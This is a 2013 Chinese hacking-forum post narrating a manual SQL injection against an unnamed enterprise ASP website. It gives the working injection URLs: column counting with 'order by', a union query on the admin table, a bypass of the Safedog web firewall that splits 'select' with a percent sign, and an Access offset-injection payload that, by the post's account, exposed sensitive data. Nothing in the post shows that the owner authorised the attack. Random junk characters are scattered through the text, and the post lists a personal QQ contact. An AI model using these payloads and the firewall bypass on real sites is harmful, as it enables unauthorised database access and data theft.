中国网络渗透测试联盟

标题: 一次手工渗透突破安全狗防御+ACCESS偏移注入 [打印本页]

作者: admin    时间: 2013-3-8 21:49
标题: 一次手工渗透突破安全狗防御+ACCESS偏移注入
打开网站,一个企业站。2 T, ~% p$ Y, l, h/ N7 s/ r

" O0 w4 o  G: o% [% d0 n
3 z4 x& u+ ~$ q" g, ]顺手加个admin4 z1 A) q4 a7 j- j$ C9 f
% O. u! {& Y/ r' v

( y: ^& V- n* [- k) M默认后台。
  @4 V7 @; b5 S* C  I0 M回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。​* l% ~, ~  g% F. x# ?

9 A* w; a7 X& g4 S3 D
8 V' g9 ?3 |6 O& ~
" q6 c+ j# }  G! ^3 D所以就不用御剑扫了,待会直接封IP。
. m5 M/ [* [$ ~% O0 ~ ) q* d, Z4 [6 ]5 ], s* b
用order by语句判断是否存在注入。8 e/ m5 O+ j+ U" _+ p5 J5 l7 [
http://www.xxx.com /product_show.asp?id=997 order by 1  i3 B& f) }, n1 c$ u/ g
http://www.xxx.com /product_show.asp?id=997 order by 100
3 e* T; {* a: ?7 E3 O$ `4 X& J现在存在注入,经测试后发现是9个字段。6 t. ]% Y0 u: V( D

# i/ K" v9 F; c' `6 Y0 b) Z接下来进行联合查询,猜是否存在admin表。
+ W4 R/ z. M4 R' h6 ]/ W$ e: Rhttp://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。​1 j* P; K9 e2 D# f
8 Q- q$ a7 o$ P7 u) z

- O# e. I7 B! `! W& V" }- H3 s* x: @: `3 i) _9 P% I
在select中间加个%,se%lect绕过安全狗。
0 V9 ?$ w$ m# {. ~6 w! A  A* o
& Z3 m1 w2 P7 l4 P. @& k* l, R7 c6 t& Q: {# w9 J3 O. r$ G. U
发现存在admin表,然后开始手工猜常用的字段。
9 }6 r8 U" v9 D  P& d1 [% n4 s纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
) S, W$ A: a' t* _0 N9 ? + x0 U8 L4 b) ?' ?& ?3 u2 O4 O$ f& K
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
0 i2 o( e7 U5 T; L5 C! C2 W+ _
: b- t4 ]- ?5 w, {# h! X科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
6 F3 I! p1 L6 }$ s- q+ o, ~http://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin4 U# i, J, X4 O% H$ M0 u
好了,敏感内容出显了。​
: A9 ?6 y& H9 @" l: b# p
, {: P+ o3 X& c$ u: j8 i; i$ E, e! _' B0 i1 c

5 ?3 B5 i+ E. q+ v




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2